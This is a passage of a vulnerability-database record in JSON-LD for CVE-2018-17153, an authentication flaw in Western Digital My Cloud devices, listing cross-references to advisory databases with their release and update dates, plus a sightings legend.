"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"db": "BID",
"id": "105359"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
},
{
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-18T00:00:00",
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"date": "2018-09-19T00:00:00",
"db": "BID",
"id": "105359"
},
{
"date": "2019-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"date": "2023-07-28T14:03:45",
"db": "PACKETSTORM",
"id": "173802"
},
{
"date": "2018-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-848"
},
{
"date": "2018-09-18T15:29:00.307000",
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-07-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-17153"
},
{
"date": "2018-09-19T00:00:00",
"db": "BID",
"id": "105359"
},
{
"date": "2019-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012205"
},
{
"date": "2018-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-848"
},
{
"date": "2024-11-21T03:53:58.427000",
"db": "NVD",
"id": "CVE-2018-17153"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "173802"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012205"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-848"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…